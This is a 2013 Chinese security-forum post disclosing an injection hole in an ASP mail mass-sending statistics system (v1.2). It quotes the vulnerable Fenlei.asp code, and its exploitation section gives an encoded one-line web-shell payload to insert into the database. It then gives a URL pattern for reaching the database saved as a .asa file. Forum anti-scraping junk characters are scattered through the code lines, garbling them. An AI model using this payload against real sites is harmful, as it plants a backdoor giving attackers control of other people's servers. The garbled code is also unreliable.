找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2105|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ( N; M7 B# W3 {
0 X: a9 J% E9 @. T4 _7 A4 Y
IF Request.QueryString("Action")="del" Then " s% R# P5 B" U6 N
ID=Request.QueryString("ID")
2 ^) V; r5 D1 W$ e3 mIF Countss ("tui","Fenlei",ID )<>0 then
  m5 L0 M  \8 V6 [+ q, j" P'略
- W4 a) L2 `9 C' |IF Request.QueryString("Action")="Add" Then
8 Z2 `! W( o! QTname=Request.Form("Typename")
, G: E+ w" u' t5 N% _+ XSet Rs=Server.CreateObject("adodb.Recordset")
* c6 |! F5 h$ M- r3 i' VSql="Select * From Fenlei Order by id Desc " 9 Z) O: U1 Z# ?# M" O
Rs.Open Sql,Conn,1,3 1 |7 s0 ]9 j& `* M; P, |
Rs.Addnew
5 ^4 _8 t' p; j& U5 G5 n8 LRs("Typename")=Tname ' u8 x; _$ t: w5 t
'略 5 O4 {# @; t/ x& f' T* i$ o  a7 h
Set Rs=Server.CreateObject("adodb.Recordset") : o. B: V% n4 E) }
Sql="Select * From Fenlei Order by id Desc " ! D, R  Y; k: S7 Q. A! s
Rs.Open Sql,Conn,1,1
! O" p) D( i. b2 _. K% A6 \: k$ H1 V'略 0 n3 ?. E( b, c1 B/ t  ^
%>$ h+ W. N. L+ d- K6 Z2 S

# X1 H- T) z: e$ j! j
# U8 Y3 V0 I( H2 v  Q; {
9 x& @- ^8 {+ n. A, d( q. j% d没有过滤,直接写入数据库。4 h7 Q' Q" q0 ]- z( Q

! t& q, @; C, E' f% m6 i) z利用方法:' B6 G) l& O% m% q/ C1 P9 K
% v/ S8 b' {0 u4 H
插入:┼攠數畣整爠煥敵瑳∨≡┩>
' E/ X  q* `: P6 B, t , s  x3 ^2 v  r! X/ g9 S
- L0 b2 G  c4 K
连接: http://www.xxx.com/###tongbaner.asa
* q' a0 [7 u; F  A8 G'默认安装文件: ( x/ n6 R* H6 n* f
'install.asp
( g4 m  o2 b1 y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表